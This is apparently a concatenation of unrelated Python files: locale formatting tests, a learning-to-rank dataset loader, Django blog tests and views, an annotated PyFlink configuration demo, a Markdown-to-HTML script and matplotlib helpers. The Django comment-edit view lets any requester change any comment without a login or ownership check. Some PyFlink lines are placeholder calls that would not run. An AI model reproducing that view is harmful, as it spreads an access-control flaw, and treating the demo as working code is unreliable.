result = self.locale._format_relative("एक घण्टा", "hour", -1)
self.assertEqual(result, "एक घण्टा पहिले")
class IndonesianLocaleTests(Chai):
def setUp(self):
super(IndonesianLocaleTests, self).setUp()
self.locale = locales.IndonesianLocale()
def test_timeframes(self):
self.assertEqual(self.locale._format_timeframe("hours", 2), "2 jam")
self.assertEqual(self.locale._format_timeframe("months", 2), "2 bulan")
self.assertEqual(self.locale._format_timeframe("days", 2), "2 hari")
self.assertEqual(self.locale._format_timeframe("years", 2), "2 tahun")
self.assertEqual(self.locale._format_timeframe("hours", 3), "3 jam")
self.assertEqual(self.locale._format_timeframe("months", 4), "4 bulan")
self.assertEqual(self.locale._format_timeframe("days", 3), "3 hari")
self.assertEqual(self.locale._format_timeframe("years", 5), "5 tahun")
def test_format_relative_now(self):
self.assertEqual(
self.locale._format_relative("baru saja", "now", 0), "baru saja"
)
def test_format_relative_past(self):
self.assertEqual(
self.locale._format_relative("1 jam", "hour", 1), "dalam 1 jam"
)
self.assertEqual(
self.locale._format_relative("1 detik", "seconds", 1), "dalam 1 detik"
)
def test_format_relative_future(self):
self.assertEqual(
self.locale._format_relative("1 jam", "hour", -1), "1 jam yang lalu"
)
class TagalogLocaleTests(Chai):
def setUp(self):
super(TagalogLocaleTests, self).setUp()
self.locale = locales.TagalogLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("minute", 1), "isang minuto")
self.assertEqual(self.locale._format_timeframe("hour", 1), "isang oras")
self.assertEqual(self.locale._format_timeframe("month", 1), "isang buwan")
self.assertEqual(self.locale._format_timeframe("year", 1), "isang taon")
self.assertEqual(self.locale._format_timeframe("seconds", 2), "segundo")
self.assertEqual(self.locale._format_timeframe("minutes", 3), "3 minuto")
self.assertEqual(self.locale._format_timeframe("hours", 4), "4 oras")
self.assertEqual(self.locale._format_timeframe("months", 5), "5 buwan")
self.assertEqual(self.locale._format_timeframe("years", 6), "6 taon")
def test_format_relative_now(self):
self.assertEqual(
self.locale._format_relative("ngayon lang", "now", 0), "ngayon lang"
)
def test_format_relative_past(self):
self.assertEqual(
self.locale._format_relative("2 oras", "hour", 2), "2 oras mula ngayon"
)
def test_format_relative_future(self):
self.assertEqual(
self.locale._format_relative("3 oras", "hour", -3), "nakaraang 3 oras"
)
def test_ordinal_number(self):
self.assertEqual(self.locale.ordinal_number(0), "ika-0")
self.assertEqual(self.locale.ordinal_number(1), "ika-1")
self.assertEqual(self.locale.ordinal_number(2), "ika-2")
self.assertEqual(self.locale.ordinal_number(3), "ika-3")
self.assertEqual(self.locale.ordinal_number(10), "ika-10")
self.assertEqual(self.locale.ordinal_number(23), "ika-23")
self.assertEqual(self.locale.ordinal_number(100), "ika-100")
self.assertEqual(self.locale.ordinal_number(103), "ika-103")
self.assertEqual(self.locale.ordinal_number(114), "ika-114")
class EstonianLocaleTests(Chai):
def setUp(self):
super(EstonianLocaleTests, self).setUp()
self.locale = locales.EstonianLocale()
def test_format_timeframe(self):
self.assertEqual(self.locale._format_timeframe("now", 0), "just nüüd")
self.assertEqual(self.locale._format_timeframe("second", 1), "ühe sekundi")
self.assertEqual(self.locale._format_timeframe("seconds", 3), "3 sekundi")
self.assertEqual(self.locale._format_timeframe("seconds", 30), "30 sekundi")
self.assertEqual(self.locale._format_timeframe("minute", 1), "ühe minuti")
self.assertEqual(self.locale._format_timeframe("minutes", 4), "4 minuti")
self.assertEqual(self.locale._format_timeframe("minutes", 40), "40 minuti")
self.assertEqual(self.locale._format_timeframe("hour", 1), "tunni aja")
self.assertEqual(self.locale._format_timeframe("hours", 5), "5 tunni")
self.assertEqual(self.locale._format_timeframe("hours", 23), "23 tunni")
self.assertEqual(self.locale._format_timeframe("day", 1), "ühe päeva")
self.assertEqual(self.locale._format_timeframe("days", 6), "6 päeva")
self.assertEqual(self.locale._format_timeframe("days", 12), "12 päeva")
self.assertEqual(self.locale._format_timeframe("month", 1), "ühe kuu")
self.assertEqual(self.locale._format_timeframe("months", 7), "7 kuu")
self.assertEqual(self.locale._format_timeframe("months", 11), "11 kuu")
self.assertEqual(self.locale._format_timeframe("year", 1), "ühe aasta")
self.assertEqual(self.locale._format_timeframe("years", 8), "8 aasta")
self.assertEqual(self.locale._format_timeframe("years", 12), "12 aasta")
self.assertEqual(self.locale._format_timeframe("now", 0), "just nüüd")
self.assertEqual(self.locale._format_timeframe("second", -1), "üks sekund")
self.assertEqual(self.locale._format_timeframe("seconds", -9), "9 sekundit")
self.assertEqual(self.locale._format_timeframe("seconds", -12), "12 sekundit")
self.assertEqual(self.locale._format_timeframe("minute", -1), "üks minut")
self.assertEqual(self.locale._format_timeframe("minutes", -2), "2 minutit")
self.assertEqual(self.locale._format_timeframe("minutes", -10), "10 minutit")
self.assertEqual(self.locale._format_timeframe("hour", -1), "tund aega")
self.assertEqual(self.locale._format_timeframe("hours", -3), "3 tundi")
self.assertEqual(self.locale._format_timeframe("hours", -11), "11 tundi")
self.assertEqual(self.locale._format_timeframe("day", -1), "üks päev")
self.assertEqual(self.locale._format_timeframe("days", -2), "2 päeva")
self.assertEqual(self.locale._format_timeframe("days", -12), "12 päeva")
self.assertEqual(self.locale._format_timeframe("month", -1), "üks kuu")
self.assertEqual(self.locale._format_timeframe("months", -3), "3 kuud")
self.assertEqual(self.locale._format_timeframe("months", -13), "13 kuud")
self.assertEqual(self.locale._format_timeframe("year", -1), "üks aasta")
self.assertEqual(self.locale._format_timeframe("years", -4), "4 aastat")
self.assertEqual(self.locale._format_timeframe("years", -14), "14 aastat")
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
# Copyright (C) H.R. Oosterhuis 2021.
# Distributed under the MIT License (see the accompanying README.md and LICENSE files).
import numpy as np
import os.path
import gc
import json
FOLDDATA_WRITE_VERSION = 4
def _add_zero_to_vector(vector):
return np.concatenate([np.zeros(1, dtype=vector.dtype), vector])
def get_dataset_from_json_info(
dataset_name,
info_path,
store_pickle_after_read = True,
read_from_pickle = True,
feature_normalization = True,
purge_test_set = True):
with open(info_path) as f:
all_info = json.load(f)
assert dataset_name in all_info, 'Dataset: %s not found in info file: %s' % (dataset_name, all_info.keys())
set_info = all_info[dataset_name]
assert set_info['num_folds'] == len(set_info['fold_paths']), 'Missing fold paths for %s' % dataset_name
if feature_normalization:
num_feat = set_info['num_unique_feat']
else:
num_feat = set_info['num_nonzero_feat']
  # pass the keyword arguments through; previously they were accepted here
  # but silently ignored
  return DataSet(dataset_name,
                 set_info['fold_paths'],
                 set_info['num_relevance_labels'],
                 num_feat,
                 set_info['num_nonzero_feat'],
                 store_pickle_after_read=store_pickle_after_read,
                 read_from_pickle=read_from_pickle,
                 feature_normalization=feature_normalization,
                 purge_test_set=purge_test_set,
                 already_normalized=set_info['query_normalized']
                 )
class DataSet(object):
"""
Class designed to manage meta-data for datasets.
"""
def __init__(self,
name,
data_paths,
num_rel_labels,
num_features,
num_nonzero_feat,
store_pickle_after_read = True,
read_from_pickle = True,
feature_normalization = True,
purge_test_set = True,
already_normalized=False):
self.name = name
self.num_rel_labels = num_rel_labels
self.num_features = num_features
self.data_paths = data_paths
self.store_pickle_after_read = store_pickle_after_read
self.read_from_pickle = read_from_pickle
self.feature_normalization = feature_normalization
self.purge_test_set = purge_test_set
    self._num_nonzero_feat = num_nonzero_feat
    self.already_normalized = already_normalized
def num_folds(self):
return len(self.data_paths)
def get_data_folds(self):
return [DataFold(self, i, path) for i, path in enumerate(self.data_paths)]
class DataFoldSplit(object):
def __init__(self, datafold, name, doclist_ranges, feature_matrix, label_vector):
self.datafold = datafold
self.name = name
self.doclist_ranges = doclist_ranges
self.feature_matrix = feature_matrix
self.label_vector = label_vector
def num_queries(self):
return self.doclist_ranges.shape[0] - 1
def num_docs(self):
return self.feature_matrix.shape[0]
def query_values_from_vector(self, qid, vector):
s_i, e_i = self.query_range(qid)
return vector[s_i:e_i]
def query_range(self, query_index):
s_i = self.doclist_ranges[query_index]
e_i = self.doclist_ranges[query_index+1]
return s_i, e_i
def query_size(self, query_index):
s_i = self.doclist_ranges[query_index]
e_i = self.doclist_ranges[query_index+1]
return e_i - s_i
def query_sizes(self):
return (self.doclist_ranges[1:] - self.doclist_ranges[:-1])
def max_query_size(self):
return np.amax(self.query_sizes())
def query_labels(self, query_index):
s_i = self.doclist_ranges[query_index]
e_i = self.doclist_ranges[query_index+1]
return self.label_vector[s_i:e_i]
def query_feat(self, query_index):
s_i = self.doclist_ranges[query_index]
e_i = self.doclist_ranges[query_index+1]
return self.feature_matrix[s_i:e_i, :]
def doc_feat(self, query_index, doc_index):
s_i = self.doclist_ranges[query_index]
e_i = self.doclist_ranges[query_index+1]
assert s_i + doc_index < self.doclist_ranges[query_index+1]
return self.feature_matrix[s_i + doc_index, :]
def doc_str(self, query_index, doc_index):
doc_feat = self.doc_feat(query_index, doc_index)
feat_i = np.where(doc_feat)[0]
doc_str = ''
for f_i in feat_i:
doc_str += '%s:%f ' % (self.datafold.feature_map[f_i], doc_feat[f_i])
return doc_str
class DataFold(object):
def __init__(self, dataset, fold_num, data_path):
self.name = dataset.name
self.num_rel_labels = dataset.num_rel_labels
self.num_features = dataset.num_features
self.fold_num = fold_num
self.data_path = data_path
self._data_ready = False
self.store_pickle_after_read = dataset.store_pickle_after_read
self.read_from_pickle = dataset.read_from_pickle
self.feature_normalization = dataset.feature_normalization
self.purge_test_set = dataset.purge_test_set
self._num_nonzero_feat = dataset._num_nonzero_feat
def max_query_size(self):
return np.amax((
self.train.max_query_size(),
self.validation.max_query_size(),
self.test.max_query_size(),
),)
def data_ready(self):
return self._data_ready
def clean_data(self):
del self.train
del self.validation
del self.test
self._data_ready = False
gc.collect()
def _read_file(self, path, feat_map, purge):
'''
Read letor file.
'''
queries = []
cur_docs = []
cur_labels = []
current_qid = None
for line in open(path, 'r'):
info = line[:line.find('#')].split()
qid = info[1].split(':')[1]
label = int(info[0])
feat_pairs = info[2:]
if current_qid is None:
current_qid = qid
elif current_qid != qid:
stacked_documents = np.stack(cur_docs, axis=0)
if self.feature_normalization:
stacked_documents -= np.amin(stacked_documents, axis=0)[None, :]
safe_max = np.amax(stacked_documents, axis=0)
safe_max[safe_max == 0] = 1.
stacked_documents /= safe_max[None, :]
np_labels = np.array(cur_labels, dtype=np.int64)
if not purge or np.any(np.greater(np_labels, 0)):
queries.append(
{
'qid': current_qid,
'n_docs': stacked_documents.shape[0],
'labels': np_labels,
'documents': stacked_documents
}
)
current_qid = qid
cur_docs = []
cur_labels = []
doc_feat = np.zeros(self._num_nonzero_feat)
for pair in feat_pairs:
feat_id, feature = pair.split(':')
feat_id = int(feat_id)
feat_value = float(feature)
if feat_id not in feat_map:
feat_map[feat_id] = len(feat_map)
assert feat_map[feat_id] < self._num_nonzero_feat, '%s features found but %s expected' % (feat_map[feat_id], self._num_nonzero_feat)
doc_feat[feat_map[feat_id]] = feat_value
cur_docs.append(doc_feat)
      cur_labels.append(label)
    # flush the final query after the loop; without this the last query
    # in the file would be silently dropped
    if cur_docs:
      stacked_documents = np.stack(cur_docs, axis=0)
      if self.feature_normalization:
        stacked_documents -= np.amin(stacked_documents, axis=0)[None, :]
        safe_max = np.amax(stacked_documents, axis=0)
        safe_max[safe_max == 0] = 1.
        stacked_documents /= safe_max[None, :]
      np_labels = np.array(cur_labels, dtype=np.int64)
      if not purge or np.any(np.greater(np_labels, 0)):
        queries.append(
          {
            'qid': current_qid,
            'n_docs': stacked_documents.shape[0],
            'labels': np_labels,
            'documents': stacked_documents
          }
        )
    all_docs = np.concatenate([x['documents'] for x in queries], axis=0)
all_n_docs = np.array([x['n_docs'] for x in queries], dtype=np.int64)
all_labels = np.concatenate([x['labels'] for x in queries], axis=0)
query_ranges = _add_zero_to_vector(np.cumsum(all_n_docs))
return query_ranges, all_docs, all_labels
def _create_feature_mapping(self, feature_dict):
total_features = 0
feature_map = {}
for fid in feature_dict:
if fid not in feature_map:
feature_map[fid] = total_features
total_features += 1
return feature_map
def _normalize_feat(self, query_ranges, feature_matrix):
non_zero_feat = np.zeros(feature_matrix.shape[1], dtype=bool)
for qid in range(query_ranges.shape[0]-1):
s_i, e_i = query_ranges[qid:qid+2]
cur_feat = feature_matrix[s_i:e_i,:]
min_q = np.amin(cur_feat, axis=0)
max_q = np.amax(cur_feat, axis=0)
cur_feat -= min_q[None, :]
denom = max_q - min_q
denom[denom == 0.] = 1.
cur_feat /= denom[None, :]
non_zero_feat += np.greater(max_q, min_q)
return non_zero_feat
def read_data(self):
"""
Reads data from a fold folder (letor format).
"""
data_read = False
if self.feature_normalization and self.purge_test_set:
pickle_name = 'binarized_purged_querynorm.npz'
elif self.feature_normalization:
pickle_name = 'binarized_querynorm.npz'
elif self.purge_test_set:
pickle_name = 'binarized_purged.npz'
else:
pickle_name = 'binarized.npz'
pickle_path = self.data_path + pickle_name
train_raw_path = self.data_path + 'train.txt'
valid_raw_path = self.data_path + 'vali.txt'
test_raw_path = self.data_path + 'test.txt'
if self.read_from_pickle and os.path.isfile(pickle_path):
loaded_data = np.load(pickle_path, allow_pickle=True)
if loaded_data['format_version'] == FOLDDATA_WRITE_VERSION:
feature_map = loaded_data['feature_map'].item()
train_feature_matrix = loaded_data['train_feature_matrix']
train_doclist_ranges = loaded_data['train_doclist_ranges']
train_label_vector = loaded_data['train_label_vector']
valid_feature_matrix = loaded_data['valid_feature_matrix']
valid_doclist_ranges = loaded_data['valid_doclist_ranges']
valid_label_vector = loaded_data['valid_label_vector']
test_feature_matrix = loaded_data['test_feature_matrix']
test_doclist_ranges = loaded_data['test_doclist_ranges']
test_label_vector = loaded_data['test_label_vector']
data_read = True
del loaded_data
if not data_read:
feature_map = {}
(train_doclist_ranges,
train_feature_matrix,
train_label_vector) = self._read_file(train_raw_path,
feature_map,
False)
(valid_doclist_ranges,
valid_feature_matrix,
valid_label_vector) = self._read_file(valid_raw_path,
feature_map,
False)
(test_doclist_ranges,
test_feature_matrix,
test_label_vector) = self._read_file(test_raw_path,
feature_map,
self.purge_test_set)
assert len(feature_map) == self._num_nonzero_feat, '%d non-zero features found but %d expected' % (len(feature_map), self._num_nonzero_feat)
if self.feature_normalization:
non_zero_feat = self._normalize_feat(train_doclist_ranges,
train_feature_matrix)
self._normalize_feat(valid_doclist_ranges,
valid_feature_matrix)
self._normalize_feat(test_doclist_ranges,
test_feature_matrix)
list_map = [x[0] for x in sorted(feature_map.items(), key=lambda x: x[1])]
filtered_list_map = [x for i, x in enumerate(list_map) if non_zero_feat[i]]
feature_map = {}
for i, x in enumerate(filtered_list_map):
feature_map[x] = i
train_feature_matrix = train_feature_matrix[:, non_zero_feat]
valid_feature_matrix = valid_feature_matrix[:, non_zero_feat]
test_feature_matrix = test_feature_matrix[:, non_zero_feat]
# sort found features so that feature id ascends
sorted_map = sorted(feature_map.items())
transform_ind = np.array([x[1] for x in sorted_map])
train_feature_matrix = train_feature_matrix[:, transform_ind]
valid_feature_matrix = valid_feature_matrix[:, transform_ind]
test_feature_matrix = test_feature_matrix[:, transform_ind]
feature_map = {}
for i, x in enumerate([x[0] for x in sorted_map]):
feature_map[x] = i
if self.store_pickle_after_read:
np.savez_compressed(pickle_path,
format_version = FOLDDATA_WRITE_VERSION,
feature_map = feature_map,
train_feature_matrix = train_feature_matrix,
train_doclist_ranges = train_doclist_ranges,
train_label_vector = train_label_vector,
valid_feature_matrix = valid_feature_matrix,
valid_doclist_ranges = valid_doclist_ranges,
valid_label_vector = valid_label_vector,
test_feature_matrix = test_feature_matrix,
test_doclist_ranges = test_doclist_ranges,
test_label_vector = test_label_vector,
)
n_feat = len(feature_map)
assert n_feat == self.num_features, '%d features found but %d expected' % (n_feat, self.num_features)
self.inverse_feature_map = feature_map
self.feature_map = [x[0] for x in sorted(feature_map.items(), key=lambda x: x[1])]
self.train = DataFoldSplit(self,
'train',
train_doclist_ranges,
train_feature_matrix,
train_label_vector)
self.validation = DataFoldSplit(self,
'validation',
valid_doclist_ranges,
valid_feature_matrix,
valid_label_vector)
self.test = DataFoldSplit(self,
'test',
test_doclist_ranges,
test_feature_matrix,
test_label_vector)
self._data_ready = True
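# Minimal usage sketch (the dataset name and info-file path below are
# illustrative assumptions, not values shipped with this module):
# data = get_dataset_from_json_info('MSLR-WEB10K', 'datasets_info.json')
# fold = data.get_data_folds()[0]
# fold.read_data()
# print(fold.train.num_queries(), 'train queries,',
#       fold.train.num_docs(), 'train documents')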
|
nilq/baby-python
|
python
|
from django.test import TestCase
from django.urls import reverse
from .models import Post
# Create your tests here.
class PostModelTest(TestCase):
def setUp(self):
Post.objects.create(title='Mavzu', text='yangilik matni')
    def test_text_content(self):
        # look the post up by a known field instead of assuming the primary key is 1
        post = Post.objects.get(title='Mavzu')
        self.assertEqual(post.title, 'Mavzu')
        self.assertEqual(post.text, 'yangilik matni')
class HomePageViewTest(TestCase):
def setUp(self):
Post.objects.create(title='Mavzu 2', text='boshqa yangilik')
def test_views_url_exists_at_proper_location(self):
resp = self.client.get('/')
self.assertEqual(resp.status_code, 200)
def test_view_url_by_name(self):
resp = self.client.get(reverse('home'))
self.assertEqual(resp.status_code, 200)
def test_view_uses_correct_template(self):
resp = self.client.get(reverse('home'))
self.assertEqual(resp.status_code, 200)
self.assertTemplateUsed(resp, 'home.html')
|
nilq/baby-python
|
python
|
from django.shortcuts import render, redirect, get_object_or_404
from .models import BlogPost as blog
from .models import Comment
from .forms import CreateCommentForm, UpdateCommentForm
# Create your views here.
def post_view(request):
qs=blog.objects.all()
context = {
'qs' : qs,
}
return render(request, 'blog/main.html', context)
def detail_blog_view(request, slug):
context = {}
blog_post = get_object_or_404(blog, slug=slug)
comments = Comment.objects.filter(blog=blog_post)
context['blog_post'] = blog_post
context['comments'] = comments
context['visible'] = True
user = request.user
context['user'] = user.username
    if not user.is_authenticated:
        context['visible'] = False
    form = CreateCommentForm(request.POST or None, request.FILES or None)
    # only save the comment for authenticated users; an AnonymousUser
    # cannot be assigned as the comment author
    if form.is_valid() and user.is_authenticated:
        obj = form.save(commit=False)
        obj.blog = blog_post
        obj.author = user
        obj.save()
        form = CreateCommentForm()  # present a fresh form after saving
    context['form'] = form
return render(request, 'blog/detail_blog.html', context)
def update_comment_view(request, id):
    com = get_object_or_404(Comment, id=id)
    context = {}
    if request.method == 'POST':
        form = UpdateCommentForm(request.POST or None, request.FILES or None, instance=com)
        if form.is_valid():
            form.save()
            return redirect('/blog1/' + com.blog.slug)
    else:
        # pre-fill the form with the current comment body
        form = UpdateCommentForm(initial={'body': com.body})
    context['form'] = form
    return render(request, "blog/edit_comment.html", context)
|
nilq/baby-python
|
python
|
from pyflink.common import ExecutionMode, RestartStrategies
from pyflink.common.serialization import JsonRowDeserializationSchema
from pyflink.common.typeinfo import Types
from pyflink.dataset import ExecutionEnvironment
from pyflink.datastream import StreamExecutionEnvironment, CheckpointingMode, ExternalizedCheckpointCleanup, TimeCharacteristic, RocksDBStateBackend
from pyflink.datastream.connectors import FlinkKafkaConsumer
def demo01():
    # Create an execution environment that represents the context in which the
    # program is currently executed. If the program is invoked standalone, the
    # method returns a local execution environment.
    # 1: create a stream execution environment -- local when started locally,
    # cluster-side when started on a cluster
    env = StreamExecutionEnvironment.get_execution_environment()
    # Add a list of URLs that are added to the classpath of every user-code
    # class loader of the program. Paths must specify a protocol (e.g. file://)
    # and be accessible on all nodes.
    env.add_classpaths("file://lib")
    # Add a list of jar files that will be uploaded to the cluster and
    # referenced by the job.  .set_string("pipeline.jars", 'file://' + dir_kafka_sql_connect)
    env.add_jars("file://jars")
    # Add a python archive file. The file will be extracted to the working
    # directory of the python UDF worker.
    # Currently only zip-format is supported: zip, jar, whl, egg, etc.
    # The archive is created beforehand with: zip -r py_env.zip py_env
    env.add_python_archive("py_env.zip")
    # If the python UDFs depend on a specific python version that does not
    # exist in the cluster, this method can be used to upload a virtual
    # environment. Note that the path of the python interpreter contained in
    # the uploaded environment should be specified via this method.
    env.set_python_executable("py_env.zip/py_env/bin/python")
    # conf/flink-conf.yaml: add  python.client.executable: /usr/bin/python3
    # or
    env.add_python_archive("py_env.zip", "myenv")
    env.set_python_executable("myenv/py_env/bin/python")
    # the files contained in the archive file can be accessed in UDF
    """
    def my_udf():
        with open("myenv/py_env/data/data.txt") as f:
            ...
    """
    # Equivalent to: pip download -d cached_dir -r requirements.txt --no-binary :all:
    env.set_python_requirements("requirements.txt", "cached_dir")
    # Add a python dependency: a python file, a python package or a local
    # directory. It will be added to the PYTHONPATH of the python UDF worker.
    # Make sure these dependencies can be imported.
    env.add_python_file("")
    # Add sources
    # 1. add_source
    ds = env.add_source(
        FlinkKafkaConsumer(
            "source_topic",
            JsonRowDeserializationSchema.builder().type_info(type_info=Types.ROW([Types.INT(), Types.STRING()])).build(),
            {'bootstrap.servers': 'localhost:9092', 'group.id': 'test_group'})
    )
    # 2. from_collection
    ds = env.from_collection([1, 2, 3], Types.INT())
    # 3. from a file
    ds = env.read_text_file("hdfs://host:port/file/path")
    # disable operator chaining
    env.disable_operator_chaining()
    """
    Flink computes stateful streams very efficiently: the built-in Keyed State
    and Operator State keep the state of every operator. By default that state
    lives in JVM heap memory, so if any part of the system fails or crashes,
    all state is lost, cannot be recovered, and the whole computation is
    corrupted. Checkpoints provide the fault tolerance: checkpointing
    periodically persists the state of every operator.
    When recovering from a failure, the state of each operator is restored
    from a checkpoint and consumption restarts from the last consumed
    position, so computation stays efficient while data is neither lost nor
    processed twice.
    At least once
        AT_LEAST_ONCE
        If the transfer itself fails and the server never receives the data,
        the data is retransmitted after a timeout. But the failure may instead
        happen while the success acknowledgement is being returned, in which
        case the server already has the data and the retransmission delivers a
        duplicate -- that is at-least-once.
    Exactly once
        EXACTLY_ONCE
    The delivery guarantees are at-most-once, at-least-once and exactly-once.
    Checkpointing has two prerequisites:
    1. A source that can replay data within a certain time range, e.g. kafka.
       Fault tolerance automatically restarts the job from the most recent
       successful checkpoint, which means re-consuming the data consumed
       before the failure. If the source cannot replay, any data that was not
       yet written to storage is lost and can never be consumed again after
       recovery.
    2. A store for the persisted state, e.g. HDFS or local files, from which
       checkpoint data can be restored after a failure.
    https://ci.apache.org/projects/flink/flink-docs-release-1.12/dev/stream/state/checkpointing.html
    https://ci.apache.org/projects/flink/flink-docs-release-1.12/api/python/pyflink.datastream.html#pyflink.datastream.CheckpointConfig
    """
    # take a checkpoint every 300 s
    env.enable_checkpointing(300000, CheckpointingMode.AT_LEAST_ONCE)
    # MemoryStateBackend FsStateBackend CustomStateBackend
    env.set_state_backend(RocksDBStateBackend("file://var/checkpoints/"))
    # set mode to exactly-once (this is the default)
    env.get_checkpoint_config().set_checkpointing_mode(CheckpointingMode.EXACTLY_ONCE)
    # at least 500 ms between two checkpoints (default is 0: start the next one
    # immediately) -- make sure 500 ms of progress happen between checkpoints
    env.get_checkpoint_config().set_min_pause_between_checkpoints(500)
    # checkpoints have to complete within one minute, or are discarded
    env.get_checkpoint_config().set_checkpoint_timeout(60000)
    # allow only one checkpoint to be in progress at the same time
    env.get_checkpoint_config().set_max_concurrent_checkpoints(1)
    # keep externally stored checkpoint data when the job is cancelled --
    # enable externalized checkpoints which are retained after job cancellation
    env.get_checkpoint_config().enable_externalized_checkpoints(ExternalizedCheckpointCleanup.RETAIN_ON_CANCELLATION)
    # allow job recovery fallback to checkpoint when there is a more recent savepoint
    env.get_checkpoint_config().set_prefer_checkpoint_for_recovery(True)
    # enable the experimental unaligned checkpoints to improve performance;
    # only usable with CheckpointingMode.EXACTLY_ONCE
    env.get_checkpoint_config().enable_unaligned_checkpoints()
    # env.get_checkpoint_config().disable_unaligned_checkpoints() is the same as env.get_checkpoint_config().enable_unaligned_checkpoints(False)
    env.get_checkpoint_interval()  # same as env.get_checkpoint_config().get_checkpoint_interval()
    """
    # https://ci.apache.org/projects/flink/flink-docs-release-1.12/api/python/pyflink.common.html#pyflink.common.ExecutionConfig
    # bin/flink run -Dexecution.runtime-mode=BATCH examples/streaming/WordCount.jar
    env.get_config().set_execution_mode(ExecutionMode.BATCH)
    env.get_config().disable_auto_generated_uids()  # enable_auto_generated_uids
    # set the uid yourself
    ds.uid("xx")
    # Set the time characteristic of all streams created from this
    # environment, e.g. processing time, event time or ingestion time.
    # When set to EventTime or IngestionTime, the watermark update interval
    # defaults to 200 ms.
    env.set_stream_time_characteristic(TimeCharacteristic.EventTime)  # set the time assigner
    env.get_config().set_auto_watermark_interval(200)  # emit a watermark every 200 ms
    env.get_config().set_global_job_parameters({"environment.checkpoint_interval": "1000"})
    env.get_config().set_restart_strategy(RestartStrategies.fixed_delay_restart(10, 1000))
    # execute
    env.execute("job name")
    # asynchronous execution
    jobClient = env.execute_async("job name")
    jobClient.get_job_execution_result().result()
    """
    # Maximum time frequency (ms) at which output buffers are flushed. By
    # default buffers flush frequently for low latency and a smooth developer
    # experience. The setting has three logical modes:
    #   a positive integer: periodic flushing at that interval
    #   0: flush after every record, minimising latency (better to use a small
    #      value such as 5 or 10 instead of 0)
    #   -1: flush only when the output buffer is full, maximising throughput
    env.get_buffer_timeout()
    env.set_buffer_timeout(10)
    # Get the execution plan as JSON and paste it into https://flink.apache.org/visualizer/
    env.get_execution_plan()
    # https://ci.apache.org/projects/flink/flink-docs-release-1.12/api/python/pyflink.datastream.html
if __name__ == '__main__':
demo01()
|
nilq/baby-python
|
python
|
import sys
import os
from bs4 import BeautifulSoup
import markdown
"""
将 Markdown 转换为 HTML
"""
class MarkdownToHtml:
headTag = '<head><meta charset="utf-8" /></head>'
def __init__(self,cssFilePath = None):
if cssFilePath != None:
self.genStyle(cssFilePath)
def genStyle(self,cssFilePath):
with open(cssFilePath,'r') as f:
cssString = f.read()
self.headTag = self.headTag[:-7] + '<style type="text/css">{}</style>'.format(cssString) + self.headTag[-7:]
def markdownToHtml(self, sourceFilePath, destinationDirectory = None, outputFileName = None):
if not destinationDirectory:
# 未定义输出目录则将源文件目录(注意要转换为绝对路径)作为输出目录
destinationDirectory = os.path.dirname(os.path.abspath(sourceFilePath))
if not outputFileName:
# 未定义输出文件名则沿用输入文件名
outputFileName = os.path.splitext(os.path.basename(sourceFilePath))[0] + '.html'
if destinationDirectory[-1] != '/':
destinationDirectory += '/'
with open(sourceFilePath,'r', encoding='utf8') as f:
markdownText = f.read()
# 编译出原始 HTML 文本
rawHtml = self.headTag + markdown.markdown(markdownText,output_format='html5')
# 格式化 HTML 文本为可读性更强的格式
beautifyHtml = BeautifulSoup(rawHtml,'html5lib').prettify()
with open(destinationDirectory + outputFileName, 'w', encoding='utf8') as f:
f.write(beautifyHtml)
if __name__ == "__main__":
mth = MarkdownToHtml()
# 做一个命令行参数列表的浅拷贝,不包含脚本文件名
argv = sys.argv[1:]
# 目前列表 argv 可能包含源文件路径之外的元素(即选项信息)
# 程序最后遍历列表 argv 进行编译 markdown 时,列表中的元素必须全部是源文件路径
outputDirectory = None
if '-s' in argv:
cssArgIndex = argv.index('-s') +1
cssFilePath = argv[cssArgIndex]
# 检测样式表文件路径是否有效
if not os.path.isfile(cssFilePath):
print('Invalid Path: '+cssFilePath)
sys.exit()
mth.genStyle(cssFilePath)
# pop 顺序不能随意变化
argv.pop(cssArgIndex)
argv.pop(cssArgIndex-1)
if '-o' in argv:
dirArgIndex = argv.index('-o') +1
outputDirectory = argv[dirArgIndex]
# 检测输出目录是否有效
if not os.path.isdir(outputDirectory):
print('Invalid Directory: ' + outputDirectory)
sys.exit()
# pop 顺序不能随意变化
argv.pop(dirArgIndex)
argv.pop(dirArgIndex-1)
# 至此,列表 argv 中的元素均是源文件路径
# 遍历所有源文件路径
for filePath in argv:
# 判断文件路径是否有效
if os.path.isfile(filePath):
mth.markdownToHtml(filePath, outputDirectory)
else:
print('Invalid Path: ' + filePath)
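# Example invocation (script and file names are hypothetical):
#   python markdown_to_html.py -s style.css -o out/ README.md notes.md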
|
nilq/baby-python
|
python
|
import math
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib.transforms as mtransforms
# mpl_toolkits.axes_grid is long deprecated; in current matplotlib releases
# AnchoredText (same API) lives in matplotlib.offsetbox
from matplotlib.offsetbox import AnchoredText
def setup_axes(diff=False):
fig = plt.figure()
axes = []
if diff:
gs = gridspec.GridSpec(2, 1, height_ratios=[2,1])
        main_axis = plt.subplot(gs[0])
        axes.append(main_axis)  # reuse the axis instead of creating gs[0] twice
        axes.append(plt.subplot(gs[1], sharex=main_axis))
else:
axes.append(plt.subplot())
return fig, axes
def layout_main_and_diff_axis(fig, axes):
main_axis, diff_axis = axes
fig.subplots_adjust(hspace=0.0)
main_axis.spines['bottom'].set_visible(False)
plt.setp(main_axis.get_xticklabels(), visible=False)
main_axis.set_xlabel('')
diff_axis.xaxis.tick_bottom()
def configure_legend_on_axis(axis, title='', loc='best', borderpad=1.2, draws_background=True):
legend = axis.legend(loc=loc,
title=title,
borderaxespad=borderpad,
framealpha=0.8,
frameon=draws_background,
fancybox=draws_background)
legend.get_frame().set_color((0.96,0.96,0.96))
for line in legend.get_lines():
line.set_alpha(1.0)
def add_annotation_on_axis(axis, annotation, loc='upper right', borderpad=1.2):
codes = {'upper right': 1, 'upper left': 2, 'lower left': 3, 'lower right': 4,
'right': 5, 'center left': 6,'center right': 7,
'lower center': 8, 'upper center': 9, 'center': 10}
at = AnchoredText(annotation,
codes[loc],
frameon=False,
borderpad=borderpad,
prop=dict(linespacing=2.5))
axis.add_artist(at)
def get_major_ticks_within_view_interval(axis):
interval = axis.get_view_interval()
ticks_in_view_interval = []
for tick, loc in zip(axis.get_major_ticks(),
axis.get_major_locator()()):
if mtransforms.interval_contains(interval, loc):
ticks_in_view_interval.append(tick)
return ticks_in_view_interval
def set_figure_size_with_width(width):
params = {'figure.figsize': figure_size_from_width(width)}
plt.rcParams.update(params)
def figure_size_from_width(width):
